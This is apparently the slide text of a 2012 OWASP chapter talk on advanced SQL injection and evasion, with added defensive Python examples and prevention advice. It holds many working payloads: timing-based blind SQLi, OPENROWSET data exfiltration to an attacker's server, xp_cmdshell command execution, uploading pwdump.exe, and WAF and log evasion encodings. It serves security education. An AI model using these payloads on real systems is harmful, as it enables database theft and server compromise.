owasp indy q2 2012 advanced sqli
Advanced SQLi and Evasion Techniques
Introduction
Damian Profancik | Technical Lead/Security Services Leader @ Apparatus
[email protected]
@integrisec
Credit
Cesar Cerrudo – CTO, IOActive Labs
  o http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf
ModSecurity Team – Trustwave SpiderLabs
  o http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons-learned.html
Avi Douglen – OWASP Board Member, Israel
  o http://www.comsecglobal.com/framework/Upload/SQL_Smuggling.pdf
SQL Injection Basics
• Dynamic construction of SQL queries
  "SELECT * FROM table WHERE user = '" + uname + "' AND pwd = '" + pword + "'"
• Unsanitized user input
  uname = ' or 1=1--  =>  SELECT * FROM table WHERE user = '' or 1=1-- ' AND pwd = ''
• Excessive permissions
  o Web services running as privileged user with db_owner rights
  o Connecting to database using sa, dbo, or sysadmin accounts
  o Lax file system permissions
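The two query styles contrasted above, as an added example (not code from the talk): a login check built by string concatenation next to its parameterized form, run against an in-memory SQLite table constructed here with the slide's `' or 1=1--` input. The table name, rows and function names are this example's assumptions.

```python
"""Vulnerable vs. parameterized login check (added example, not from the talk).
The database is an in-memory SQLite table constructed below."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data: one user with a known password.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, pwd TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return conn


def login_concat(conn: sqlite3.Connection, uname: str, pword: str) -> bool:
    # Dynamic construction exactly as on the slide: user input is spliced into
    # the SQL text, so a quote in uname ends the literal and "--" comments out
    # the password check.  Returns True for uname = ' or 1=1-- with any pword.
    sql = ("SELECT * FROM users WHERE user = '" + uname
           + "' AND pwd = '" + pword + "'")
    return conn.execute(sql).fetchone() is not None


def login_param(conn: sqlite3.Connection, uname: str, pword: str) -> bool:
    # Parameterized query: the driver binds the values separately from the
    # statement text, so quote and comment characters are data, not SQL.
    sql = "SELECT * FROM users WHERE user = ? AND pwd = ?"
    return conn.execute(sql, (uname, pword)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1--"
    print("concat  :", login_concat(db, payload, ""))   # bypassed
    print("param   :", login_param(db, payload, ""))    # rejected
```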
Advanced SQLi Techniques
• Blind SQL Injection
• Data Exfiltration
• Privilege Escalation
• Command Execution
• Uploading Files
• Internal DB Server Exploration
• Port Scanning
• Firewall Evasion
• Log Evasion
• WAF Evasion
Blind SQL Injection
Blind SQL Injection
• Differential Analysis
Example:
http://www.someforum.com/posts.php?id=2
SELECT author, title, body FROM posts WHERE ID = 2
http://www.someforum.com/posts.php?id=2 and 1=2
SELECT author, title, body FROM posts WHERE ID = 2 and 1=2
http://www.someforum.com/posts.php?id=2 and 1=1
SELECT author, title, body FROM posts WHERE ID = 2 and 1=1
Blind SQL Injection (cont.)
• Database Management System Fingerprinting
  o System Functions
    • MS SQL Server = getdate()
    • MySQL = now()
    • Oracle = sysdate()
    • Example: http://www.someforum.com/posts.php?id=2 and getdate()=getdate()
  o String Concatenation
    • MS SQL Server = +
    • MySQL = +, CONCAT()
    • Oracle = ||, CONCAT()
    • Example: http://www.someforum.com/posts.php?id=2 and 'test'='te'+'st'
  o Query Chaining
    • MS SQL Server, MySQL = allows chaining with semicolon
    • Oracle = does NOT allow chaining with semicolon
    • Example: http://www.someforum.com/posts.php?id=2; commit --
Blind SQL Injection (cont.)
• Timing Attacks
  o Adding delay
    • SQL Server = WAITFOR DELAY '0:0:10'
    • MySQL = BENCHMARK(10000000,ENCODE('MSG','by 10 seconds'))
    • PostgreSQL = pg_sleep(10)
    • Oracle = Union with query that contains a lot of results
  o SELECT IF(condition, true, false)
Example:
…1 UNION SELECT IF(SUBSTRING(password,1,1) = CHAR(50),BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null) FROM users WHERE userid = 1;
Attacking MS SQL Server
Linked and Remote Servers
• OPENROWSET
Example:
SELECT * FROM OPENROWSET( 'SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table' )
• OPENDATASOURCE
Example:
SELECT * FROM OPENDATASOURCE( 'SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;' )
.DatabaseName.dbo.TableName
Data Exfiltration
• Remote server INSERT
Example:
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table1')
SELECT * FROM table2
Data Exfiltration (cont.)
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysdatabases')
SELECT * FROM master.dbo.sysdatabases
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysobjects')
SELECT * FROM databasename.dbo.sysobjects
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _syscolumns')
SELECT * FROM databasename.dbo.syscolumns
Data Exfiltration (cont.)
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table1')
SELECT * FROM databasename..table1
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table2')
SELECT * FROM databasename..table2
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysxlogins')
SELECT * FROM databasename.dbo.sysxlogins
Privilege Escalation
• Known vulnerabilities
Example:
SQL injection vulnerability in the RESTORE DATABASE command that can lead to privilege escalation
Team SHATTER - 4/12/2012 - http://packetstormsecurity.org/files/111788/shatter-sqlserver.txt
• Often not required
  o Connection strings using SA, dbo, sysadmin
  o Web service context
Command Execution
Example:
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM temp_table')
EXEC master.dbo.xp_cmdshell 'dir'
Uploading Files
On attacker’s server…
1. CREATE TABLE AttackerTable (data text)
2. BULK INSERT AttackerTable FROM 'pwdump.exe' WITH (codepage='RAW')
On victim’s server…
3. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersIP -Usa -Ppwn3d'
4. EXEC xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','AttackersAlias','REG_SZ','DBMSSOCN,AttackersIP,80'
5. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersAlias -Usa -Ppwn3d'
Uploading Files (cont.)
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM temp_table')
EXEC xp_cmdshell '"first script line" >> script.vbs'
…
EXEC xp_cmdshell '"second script line" >> script.vbs'
...
EXEC xp_cmdshell '"last script line" >> script.vbs'
EXEC xp_cmdshell 'script.vbs' ==> execute script to download binary
Internal DB Server Exploration
• Linked and Remote Servers
1. INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysservers')
SELECT * FROM master.dbo.sysservers
2. INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysservers')
SELECT * FROM linkedserver1.master.dbo.sysservers
3. INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysdatabases')
SELECT * FROM linkedserver1.master.dbo.sysdatabases
4. Rinse and repeat…
Port Scanning
Example:
SELECT * FROM OPENROWSET('SQLOLEDB',
'uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5',
'SELECT * FROM table')
Evasion Techniques
Firewall Evasion
• Use port 80 for outbound
Example:
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;',
'SELECT * FROM table1')
SELECT * FROM table2
Log Evasion
• Inject using POST parameters
• Long HTTP requests
  o IIS truncates requests longer than 4097 characters
  o Sun-One Application Server truncates at 4092 characters
Example:
http://www.someforum.com/posts.php?param=<4097 x 'a'>&id=2 or 1=1--
WAF Evasion
• Comments
  o # = single line comment
  o -- = single line comment
  o /* */ = inline, multi-line comment
  o /*! */ = MySQL-specific inline, multi-line comment
Example:
http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
• New line
  o %0D%0A = URL-encoded newline
  o %0B = URL-encoded vertical separator
Example:
http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM…
WAF Evasion (cont.)
• Character Encoding
  o Unicode (U+02BC = ʼ)
  o CHAR()
  o Hexadecimal
  o URL-encoding
  o Double Encoding
Example:
Double Encoding:
URL = http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM…
WAF = http://www.someforum.com/posts.php?id=2 UN%2f%2a%2a%2fION SEL%2f%2a%2a%2fECT * FROM…
Result = http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
WAF Evasion (cont.)
• Concatenation
  o EXEC()
  o Split/Join
  o Special Characters (i.e. '[', '+', '%', etc.)
Example:
Split/Join:
URL = http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users
WAF = id=SELECT name
      id=password FROM users
ASP/ASP.Net = id=SELECT name,password FROM users
Special Characters:
URL = http://www.someforum.com/posts.php?id=SEL%ECT name,password FR%OM users
WAF = id=SEL%ECT name,password FR%OM users
ASP/ASP.Net = id=SELECT name,password FROM users
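The normalization a WAF or application has to apply before it matches anything (the "Normalize Input" step of the prevention slide), as an added example that is not code from the talk: it undoes the inline-comment, newline, double-encoding and split/join tricks from the last three slides, so the inspected string is the one the database would actually see. The keyword patterns, the three-round decode limit and the function names are this example's assumptions.

```python
"""Decode-then-inspect normalization for query parameters (added example, not
from the talk).  Each step reverses one evasion from the WAF Evasion slides."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# /* ... */ and the MySQL-specific /*! ... */ form, plus -- and # line comments.
_INLINE_COMMENT = re.compile(r"/\*!?.*?\*/", re.S)
_LINE_COMMENT = re.compile(r"(--|#).*?$", re.M)
# Whitespace including CR, LF and the vertical tab (%0B) used to split tokens.
_WS = re.compile(r"[ \t\r\n\x0b\x0c]+")
# Assumed illustrative patterns; a real ruleset is far larger.
_SQL_KEYWORDS = re.compile(
    r"\b(union\s+select|or\s+1=1|select\s+.+\s+from)\b", re.I)


def percent_decode(value: str, max_rounds: int = 3) -> str:
    """Decode until the text stops changing, so %252f -> %2f -> / is undone.
    max_rounds bounds the work an attacker can make the inspector do."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def normalize_sql_fragment(value: str) -> str:
    """Return the parameter as the SQL parser would see it."""
    value = percent_decode(value)
    value = _INLINE_COMMENT.sub("", value)   # UN/**/ION -> UNION
    value = _LINE_COMMENT.sub("", value)     # drop trailing -- / # comments
    return _WS.sub(" ", value).strip()       # UNION\r\nSELECT -> UNION SELECT


def normalized_params(url: str) -> dict:
    """Join repeated parameters with ',' as ASP/ASP.NET does, so the split/join
    trick (id=SELECT name&id=password FROM users) is inspected joined."""
    params = {}
    for key, val in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        params.setdefault(key, []).append(val)
    return {k: normalize_sql_fragment(",".join(v)) for k, v in params.items()}


def suspicious(url: str) -> list:
    """Names of parameters that match a keyword pattern after normalization."""
    return [k for k, v in normalized_params(url).items()
            if _SQL_KEYWORDS.search(v)]
```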
SQL Injection Prevention
SQLi Prevention
• Sanitize User Input
  o Normalize Input
  o Whitelists
  o Built-in Functions
  o Regular Expressions
  o Trust NO data source (i.e. Cookies, Referer, User-Agent, etc.)
• Prepared Statements/Parameterized Queries
• Stored Procedures
• Accounts with Least Privilege
• Enable DisallowAdhocAccess registry setting for MS SQL Server
• Perform Self Assessments
• Use a Web Application Firewall
• Filter Outbound Traffic at Firewall
Q & A